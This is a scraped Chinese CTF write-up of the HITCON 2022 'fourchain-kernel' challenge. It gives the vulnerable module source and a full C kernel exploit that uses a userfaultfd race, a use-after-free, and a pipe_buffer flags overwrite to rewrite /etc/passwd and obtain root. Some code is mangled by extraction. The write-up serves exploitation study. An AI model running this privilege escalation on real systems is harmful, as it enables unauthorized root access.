2022 HITCON -- fourchain-kernel

本文主要是介绍2022 HITCON -- fourchain-kernel，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

前言

很久没碰内核利用相关的东西了，这个题目都调了我两天（：所以还是得熟能生巧啊

题目分析

• 内核版本：v5.10，所以不存在 cg 隔离、可以使用 userfaultfd
• kaslr、smap、smep 开启
• CONFIG_SLAB_FREELIST_RANDOM 和 CONFIG_SLAB_FREELIST_HARDENED 都开了

题目给了源码，直接看源码吧：

#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/uaccess.h>
#include <linux/miscdevice.h>
#include <linux/ioctl.h>
#include <linux/random.h>#define IOC_MAGIC '\xFF'#define IO_ADD     _IOWR(IOC_MAGIC, 0, struct ioctl_arg)
#define IO_EDIT    _IOWR(IOC_MAGIC, 1, struct ioctl_arg)
#define IO_SHOW    _IOWR(IOC_MAGIC, 2, struct ioctl_arg) 
#define IO_DEL	   _IOWR(IOC_MAGIC, 3, struct ioctl_arg) struct ioctl_arg
{uint64_t idx;uint64_t size;uint64_t addr;
};struct node
{uint64_t key;uint64_t size;uint64_t addr;
};static struct node *table[0x10];
static int drv_open(struct inode *inode, struct file *filp);
static long drv_unlocked_ioctl(struct file *filp, unsigned int cmd, unsigned long arg);static struct file_operations drv_fops = {open : drv_open,unlocked_ioctl : drv_unlocked_ioctl
};static struct miscdevice note_miscdev = {.minor      = 11,.name       = "note2",.fops       = &drv_fops,.mode	= 0666,
};static int drv_open(struct inode *inode, struct file *filp){return 0;
}static long drv_unlocked_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){int ret = 0;int i = 0;uint64_t buf[0x200/8];uint64_t addr = 0;uint64_t size = 0;struct ioctl_arg data;memset(&data, 0, sizeof(data));memset(buf,0,sizeof(buf));if (copy_from_user(&data, (struct ioctl_arg __user *)arg, sizeof(data))){ret = -EFAULT;goto done;}data.idx &=0xf;data.size &=0x1ff; // 8, 16, 32, 64, 96, 128, 192, 256, 512switch (cmd){case IO_ADD:{data.idx = -1;for(i=0;i<0x10;i++){if( !table[i] ){data.idx = i;break;}}if( data.idx == -1){ret = -ENOMEM;goto done;}table[data.idx] = (struct node*)kzalloc(sizeof(struct node),GFP_KERNEL);table[data.idx]->size = data.size;get_random_bytes(&table[data.idx]->key,sizeof(table[data.idx]->key));addr = (uint64_t)kzalloc(data.size,GFP_KERNEL);ret = copy_from_user(buf, (void __user *)data.addr, data.size);for(i=0;i*8 < data.size; i++)buf[i]^= table[data.idx]->key;memcpy((void*)addr,(void*)buf,data.size);table[data.idx]->addr =  addr ^ table[data.idx]->key;}break;case IO_EDIT:{if( table[data.idx] ){addr = table[data.idx]->addr ^ table[data.idx]->key;size = table[data.idx]->size & 0x1ff;ret =  (buf, (void __user *)data.addr, size); // <======= pausefor(i=0; i*8 < size; i++)buf[i]^= table[data.idx]->key;memcpy((void*)addr,buf,size);}}break;case IO_SHOW:{	if( table[data.idx] ){addr = table[data.idx]->addr ^ table[data.idx]->key;size = table[data.idx]->size & 0x1ff;memcpy(buf,(void*)addr,size);for(i=0;i*8 < size; i++)buf[i]^= table[data.idx]->key;ret = copy_to_user((void __user *)data.addr, buf, size);}}	break;case IO_DEL:{if( table[data.idx] ){addr = table[data.idx]->addr ^ table[data.idx]->key;kfree((void*)addr);kfree(table[data.idx]);table[data.idx] = 0; // <====== 这里把 table[data.idx] 清零了 ==> 会导致 IO_EDIT 后面的 table[data.idx]->key crash}}break;default:ret = -ENOTTY;break;}	done:return ret;
}static int note_init(void){return misc_register(&note_miscdev);
}static void note_exit(void){misc_deregister(&note_miscdev);
}module_init(note_init);
module_exit(note_exit);MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Secret Note v2");

题目实现了堆块的增删查改，堆块大小限制为 [0, 0x1ff] 对应到 slub 为：8, 16, 32, 64, 96, 128, 192, 256, 512 大小的 object，最多同时创建 16 个，其维护的结构体如下：

然后这里关键的问题就是整个过程都没有上锁，所以我们可以在 edit 时去 free 掉该堆块，然后分配其他对象占据该堆块则可以覆写其他对象。并且在 edit 过程中使用了 copy_from_user，然后在结合内核版本可以总结出利用方式：在 edit 的过程中利用 userfalutfd 将其暂停，然后 free 掉该堆块，然后利用其他对象占据该堆块，从而导致覆写其他对象

但是这里有个关键的问题就是：写入的数据似乎是不可控的，因为在 copy_from_user 后会对写入的数据进行异或加密，所以这里如果想完全控制写入的内容，就得泄漏当前 node 的 key

漏洞利用

结合内核版本知道，GPF_KERNEL 和 GPF_KERNEL_ACCOUNT 是没有区别的，所以这里利用的方式挺多的，关键就是利用稳定性和成功率如何

笔者自己的利用思路【比较垃圾】

笔者选择 kmalloc-512 进行利用，主要的原因就是我想要去适配 pipe_buffer，而 96 / 192 等小堆块虽然也能适配，但是这些小堆块在内核中使用频繁，其可能会破坏堆布局

笔者首先进行堆风水去形成如下堆布局：

然后利用思路如下：

• edit(1)，然后利用 userfaultfd 暂停

  • del(1)，此时 note content1 被释放；然后 add_key 分配 user_key_payload 对象占据该堆块
  • 恢复 edit(1)，此时会覆写 user_key_payload 对象；此时覆写的内容是不可控的
    
    此时 user_key_payload 的 len 字段会被修改为一个很大的数，从而导致了越界读 note_content2 和 pipe_buffer

• edit(0)，然后利用 userfaultfd 暂停

  • del(0)，此时 note content0 被释放
  • del(2)，此时 note content2 被释放；然后立刻 add 分配 note content0 对象占据该堆块（：根据先进先出的规则，这里会先占据 note content2
    
    此时利用 user_key_payload 的越界读去泄漏 note 0 的 key（：只需要在 add 时写入 content 的内容全为 \x00 即可，因为 0 ^ key = key，所以此时读取 note content0 就可以泄漏 key
  • 然后堆喷 pipe_buffer 去占据之前释放的 note content0，由于此时已经泄漏了 key，所以写入 pipe_buffer 的内容可控
  • 恢复 edit(0)，此时会覆写 pipe_buffer 对象，这里我们修改 pipe_buffer 的 flags 字段即可打 dirty pipe

这里说明一下，笔者覆写 /bin/busybox 发现其一直报段错误，所以最后覆写的 /etc/passwd，然后这里为了看出效果，笔者给 /bin/busybox 赋了一个 s 权限以便执行 su 命令，具体就是修改 init 脚本如下：

#!/bin/shmount -t proc none /proc
mount -t tmpfs none /tmp
mount -t sysfs none /sys
mount -t devtmpfs none /dev
mkdir /dev/pts
mount /dev/ptschown 0:0 /bin/* -R
chown 0:0 /sbin/* -R
chown 0:0 /etc/* -R
chown 0:0 /usr/* -R
chmod +s /bin/busybox
chown 0:0 /root/flag*
chmod 400 /root/flag*#cat /proc/kallsyms > /tmp/kallsyms
#cat /proc/kallsyms | grep "anon_pipe_buf_ops"
#cat /proc/kallsyms | grep "page_cache_pipe_buf_ops"
#cat /proc/kallsyms | grep "user_free_payload_rcu"echo 1 > /proc/sys/kernel/dmesg_restrict
echo 1 > /proc/sys/kernel/kptr_restrictinsmod /lib/module/e1000.ko
insmod /lib/module/note2.koip link set dev eth0 up
udhcpc -i eth0 S -s /etc/udhcpc.sh
echo 'nameserver 8.8.8.8' > /etc/resolv.conf#lsmod
cd /home/note
setsid cttyhack setuidgid 1000 sh
#setsid cttyhack setuidgid 0 shumount /proc
umount /sys
umount /tmp
poweroff -f

exp 如下：成功率一般

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <assert.h>
#include <linux/if_packet.h>void err_exit(char *msg)
{printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);sleep(2);exit(EXIT_FAILURE);
}void info(char *msg)
{printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}void hexx(char *msg, size_t value)
{printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}void binary_dump(char *desc, void *addr, int len) {uint64_t *buf64 = (uint64_t *) addr;uint8_t *buf8 = (uint8_t *) addr;if (desc != NULL) {printf("\033[33m[*] %s:\n\033[0m", desc);}for (int i = 0; i < len / 8; i += 4) {printf("  %04x", i * 8);for (int j = 0; j < 4; j++) {i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");}printf("   ");for (int j = 0; j < 32 && j + i * 8 < len; j++) {printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');}puts("");}
}void bind_core(int core)
{cpu_set_t cpu_set;CPU_ZERO(&cpu_set);CPU_SET(core, &cpu_set);sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}struct ioctl_arg
{uint64_t idx;uint64_t size;uint64_t addr;
};struct node
{uint64_t key;uint64_t size;uint64_t addr;
};#define IOC_MAGIC '\xFF'#define IO_ADD     _IOWR(IOC_MAGIC, 0, struct ioctl_arg)
#define IO_EDIT    _IOWR(IOC_MAGIC, 1, struct ioctl_arg)
#define IO_SHOW    _IOWR(IOC_MAGIC, 2, struct ioctl_arg)
#define IO_DEL     _IOWR(IOC_MAGIC, 3, struct ioctl_arg)int fd;
void add(uint64_t size, void* buf) {struct ioctl_arg arg = { .size = size, .addr = (uint64_t)buf };ioctl(fd, IO_ADD, &arg);
}void edit(uint64_t idx, void* buf) {struct ioctl_arg arg = { .idx = idx, .addr = (uint64_t)buf };ioctl(fd, IO_EDIT, &arg);
}void show(uint64_t idx, void* buf) {struct ioctl_arg arg = { .idx = idx, .addr = (uint64_t)buf };ioctl(fd, IO_SHOW, &arg);
}void del(uint64_t idx) {struct ioctl_arg arg = { .idx = idx };ioctl(fd, IO_DEL, &arg);
}int key_alloc(char *description, char *payload, size_t plen)
{return syscall(__NR_add_key, "user", description, payload, plen,KEY_SPEC_PROCESS_KEYRING);
}int key_update(int keyid, char *payload, size_t plen)
{return syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);
}int key_read(int keyid, char *buffer, size_t buflen)
{return syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);
}int key_revoke(int keyid)
{return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);
}int key_unlink(int keyid)
{return syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);
}void register_userfaultfd(pthread_t* moniter_thr, void* addr, long len, void* handler)
{long uffd;struct uffdio_api uffdio_api;struct uffdio_register uffdio_register;uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);if (uffd < 0) perror("[X] syscall for __NR_userfaultfd"), exit(-1);uffdio_api.api = UFFD_API;uffdio_api.features = 0;if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) puts("[X] ioctl-UFFDIO_API"), exit(-1);uffdio_register.range.start = (long long)addr;uffdio_register.range.len = len;uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) puts("[X] ioctl-UFFDIO_REGISTER"), exit(-1);if (pthread_create(moniter_thr, NULL, handler, (void*)uffd) < 0)puts("[X] pthread_create at register_userfaultfd"), exit(-1);
}int del_idx  = 0;
uint64_t key = 0;
int run_dp   = 0;
int run_key  = 0;
int read_key = 0;
int run_leak = 0;
int run_copy = 0;
int run_read = 0;
int run_main = 0;
int run_copy1 = 0;
int run_write = 0;
struct page;
struct pipe_inode_info;
struct pipe_buf_operations;
struct pipe_buffer {struct page *page;unsigned int offset, len;const struct pipe_buf_operations *ops;unsigned int flags;unsigned long private;
};#define MAIN_PIPE (4)
#define MAIN_FILE MAIN_PIPE
//#define ATTACK_FILE "/bin/busybox"
#define ATTACK_FILE "/etc/passwd"#define PIPE_XXX (16*8)
int dp_file_fd[PIPE_XXX];
int dp_pipe_fd[PIPE_XXX][2];
int write_offset;
struct pipe_buffer evil;
int file_fd[MAIN_FILE];
int pipe_fd[MAIN_PIPE][2];char copy_src[0x1000];
void* handler1(void* arg)
{struct uffd_msg msg;struct uffdio_copy uffdio_copy;long uffd = (long)arg;for(;;){int res;struct pollfd pollfd;pollfd.fd = uffd;pollfd.events = POLLIN;if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);res = read(uffd, &msg, sizeof(msg));if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);puts("[+] Now in userfaultfd handler1");char tmp[0x1000] = { 0 };del(1);run_leak = 1;while (!run_copy) {}puts("  [+] uffd1: fill table[1]");add(40, tmp);memset(copy_src, 0, sizeof(copy_src));uffdio_copy.src = (long long)copy_src;uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);uffdio_copy.len = 0x1000;uffdio_copy.mode = 0;uffdio_copy.copy = 0;if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);}
}void* handler2(void* arg)
{struct uffd_msg msg;struct uffdio_copy uffdio_copy;long uffd = (long)arg;for(;;){int res;struct pollfd pollfd;pollfd.fd = uffd;pollfd.events = POLLIN;if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);res = read(uffd, &msg, sizeof(msg));if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);puts("[+] Now in userfaultfd handler2");char tmp[0x1000] = { 0 };del(0);del(del_idx);add(0x1ff, tmp);run_dp = 1;//      while (!run_copy1) {}//      printf("[+] fill table[%d]\n", del_idx);read_key = 1;while (!run_key) {}for (int i = 0; i < sizeof(copy_src) / 8; i++) {*(uint64_t*)(copy_src+i*8) = key;}memcpy(copy_src, &evil, sizeof(struct pipe_buffer));for (int i = 0; i < sizeof(struct pipe_buffer) / 8; i++) {*(uint64_t*)(copy_src+i*8) ^= key;}uffdio_copy.src = (long long)copy_src;uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);uffdio_copy.len = 0x1000;uffdio_copy.mode = 0;uffdio_copy.copy = 0;if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);}
}int check(uint64_t* data, int i) {if (data[i] && data[i] == data[i+1] && data[i] == data[i+2]) {if (data[i] != data[i+3]) {if(data[i] == data[i+59] && data[i] == data[i+60]) {if (data[i+3] == data[i+3+7]) {return 3;} else if (data[i+3] == data[i+3+4]) {return 2;} else if (data[i+3] == data[i+3+3]) {return 1;}}}}return 0;
}void* leak(void* args) {char tmp[0x10000] = { 0 };while (!run_leak) {}puts("[+] Leak");puts("  [+] leak: Occupy free chunk by user_key_payload");
/*#define KEY_NUM (8)int key_id[KEY_NUM];for (int i = 0; i < KEY_NUM; i++) {char desc[0x20] = { 0 };sprintf(desc, "%s%d", "des", i);key_id[i] = key_alloc(desc, tmp, 244);if (key_id[i] < 0) perror("key_alloc");}
*/int key_id = key_alloc("XiaozaYa", tmp, 244);if (key_id < 0) err_exit("key_alloc");add(0, tmp);run_copy = 1;while (!run_read) {}puts("  [+] leak: key_read data");
/*int target_key_id = -1;for (int i = 0; i < KEY_NUM && target_key_id != -1; i++) {int res = key_read(key_id[i], tmp, 0xfff0);if (res < 0) perror("key_read");if (res > 244) {puts("[+] hit key");target_key_id = i;}}if (target_key_id == -1) {puts("[X] failed to hit key");exit(-1);}printf("[+] target_key_id: %d\n", target_key_id);
*/if (key_read(key_id, tmp, 0xfff0) <= 244)err_exit("key_read");uint64_t* data = (uint64_t*)tmp;uint64_t note_offset = -1;uint64_t evil_offset = -1;for (int i = 0; i < 0xfff0 / 8; i++) {int res = check(data, i);if (res) {del_idx = res;printf("  [+] leak: hit other note  ==> id: %d\n", res);note_offset = i;printf("  [+] leak: hit note_offset ==> offset: %d\n", i);}if ((data[i]&0xfff) == 0xcc0 && data[i] > 0xffffffff81000000ULL) {//      if ((data[i]&0xfff) == 0xcc0 && data[i] > 0xffffffff81000000ULL && note_offset != -1) {evil_offset = i-2;memcpy(&evil, &data[i-2], sizeof(struct pipe_buffer));printf("  [+] leak: hit pipe_buffer ==> offset: %d\n", i);data[i-2+8] = 0x10;}if (note_offset != -1 && evil_offset != -1) {break;}}if (note_offset == -1 || evil_offset == -1) {err_exit("failed to groom heap layout");}binary_dump("note DATA", &data[note_offset], 0x10);binary_dump("pipe_buffer DATA", &data[evil_offset], sizeof(struct pipe_buffer));printf("[------- dump ------] page     : %#llx\n", evil.page);printf("[------- dump ------] offset   : %#llx\n", evil.offset);printf("[------- dump ------] len      : %#llx\n", evil.len);printf("[------- dump ------] ops      : %#llx\n", evil.ops);printf("[------- dump ------] flags    : %#llx\n", evil.flags);printf("[------- dump ------] private  : %#llx\n", evil.private);evil.flags = 0x10;evil.offset = 0;evil.len = 0;run_main = 1;while (!read_key) {}memset(tmp, 0, sizeof(tmp));key_read(key_id, tmp, 0xfff0);key = data[note_offset];printf("  [+] leak: key: %#llx\n", key);run_key = 1;puts("[+] LEAK OVER!");
}void* dirty_pipe(void* args) {int evil_idx = -1;while (!run_dp) {}puts("[+] Dirty Pipe");puts("  [+] DP: Occupy free chunk by pipe_buffer");for (int i = 0; i < PIPE_XXX; i++) {if (fcntl(dp_pipe_fd[i][1], F_SETPIPE_SZ, 0x1000*8) < 0) {printf("[+] dp_pipe_fd[%d] => ", i);perror("fcntl");break;}}puts("  [+] DP: wait run_write");while (!run_write) {}unsigned char elfcode[] = {/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x68, 0x60, 0x66, 0x01, 0x01, 0x81, 0x34, 0x24, 0x01, 0x01, 0x01, 0x01,0x48, 0xb8, 0x2f, 0x72, 0x6f, 0x6f, 0x74, 0x2f, 0x66, 0x6c, 0x50, 0x6a,0x02, 0x58, 0x48, 0x89, 0xe7, 0x31, 0xf6, 0x0f, 0x05, 0x41, 0xba, 0xff,0xff, 0xff, 0x7f, 0x48, 0x89, 0xc6, 0x6a, 0x28, 0x58, 0x6a, 0x01, 0x5f,0x99, 0x0f, 0x05, 0xEB};char *cmd = "root::00";for (int i = 0; i < PIPE_XXX; i++) {//write(dp_pipe_fd[i][1], elfcode, sizeof(elfcode));write(dp_pipe_fd[i][1], cmd, sizeof(cmd));}system("cat /etc/passwd");system("su root");puts("[+] DIRTY_PIPE OVER!");
}void increase_limit()
{int ret;struct rlimit open_file_limit;ret = getrlimit(RLIMIT_NOFILE, &open_file_limit);assert(ret >= 0);printf("[*] file limit: %d\n", open_file_limit.rlim_max);open_file_limit.rlim_cur = open_file_limit.rlim_max;ret = setrlimit(RLIMIT_NOFILE, &open_file_limit);assert(ret >= 0);
}int main(int argc, char** argv, char** envp)
{bind_core(0);increase_limit();puts("[+] main");pthread_t t1, t2, thr1, thr2;char buf[0x10000] = { 0 };void *uffd_buf1, *uffd_buf2;fd = open("/dev/note2", O_RDWR);if (fd < 0) err_exit("open /dev/note");for (int i = 0; i < MAIN_FILE; i++) {file_fd[i] = open(ATTACK_FILE, O_RDONLY);if (file_fd[i] < 0) err_exit("open" ATTACK_FILE);}pthread_create(&t1, NULL, leak, NULL);pthread_create(&t2, NULL, dirty_pipe, NULL);uffd_buf1 = mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);uffd_buf2 = mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);if (uffd_buf1 == MAP_FAILED || uffd_buf2 == MAP_FAILED) err_exit("mmap uffd_buf");register_userfaultfd(&thr1, uffd_buf1, 0x1000, handler1);register_userfaultfd(&thr2, uffd_buf2, 0x1000, handler2);puts("  [+] main: Spraying pipe_buffer");#define S_PIPE_NUM (16*32+4)int t_pipe_fd[S_PIPE_NUM][2];puts("    [+] Step I");for (int i = 0; i < S_PIPE_NUM; i++) {if (pipe(t_pipe_fd[i]) < 0) {perror("pipe");break;}if (fcntl(t_pipe_fd[i][1], F_SETPIPE_SZ, 0x1000*8) < 0) {printf("[+] t_pipe_fd[%d] => ", i);perror("fcntl");break;}loff_t offset = 1;if (splice(file_fd[0], &offset, t_pipe_fd[i][1], NULL, 1, 0) <= 0) {printf("%d\n", i);perror("splice");err_exit("splice " ATTACK_FILE);}}puts("    [+] Step II");for (int i = 0; i < PIPE_XXX; i++) {if ((dp_file_fd[i] = open(ATTACK_FILE, O_RDONLY)) < 0) err_exit("open " ATTACK_FILE);if (pipe(dp_pipe_fd[i]) < 0) err_exit("pipe");loff_t offset = 1;if (splice(dp_file_fd[i], &offset, dp_pipe_fd[i][1], NULL, 1, 0) <= 0) {printf("%d\n", i);perror("splice");err_exit("splice " ATTACK_FILE);}}puts("    [+] Step III");for (int i = 0; i < MAIN_PIPE; i++) {if (pipe(pipe_fd[i]) < 0) {perror("pipe");break;}}int index = -1;uint64_t* data = (uint64_t*)buf;for (int i = 0; i < MAIN_PIPE; i++) {for (int j = 0; j < (i+1)*2; j++) {data[j+3] = 'A'+i;}add(0x1ff, buf);memset(buf, 0, 512);if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000*8) < 0) {printf("[+] pipe_fd[%d] => ", i);perror("fcntl");break;}loff_t offset = 1;if (splice(file_fd[i], &offset, pipe_fd[i][1], NULL, 1, 0) <= 0) {printf("%d\n", i);perror("splice");err_exit("splice " ATTACK_FILE);}}puts("  [+] main: heap groom over!");edit(1, uffd_buf1);run_read = 1;while (!run_main) {}edit(0, uffd_buf2);run_write = 1;pthread_join(t1, NULL);pthread_join(t2, NULL);puts("[+] EXP NERVER END");return 0;
}

效果如下：

其他 wp 方案

这里还看了一些其他 wp 的方案，其中有一个是直接劫持 note 的 addr 字段为 modprobe_path 从而覆写 modprobe_path，但是笔者不想拘泥于拿 flag 的利用，但是这里似乎可以通过劫持 addr字段实现任意地址读写，利用任意地址读可以去泄漏 current_cred，然后利用任意地址写可以覆写 current_cred 完成提权，而且好像劫持 modprobe_path 也可以完成提权，后面再研究研究；还有一个方案是利用 cross cache 去将劫持对象替换成 cred，但是感觉略显麻烦了，后面有时间在看看吧

这篇关于2022 HITCON -- fourchain-kernel的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---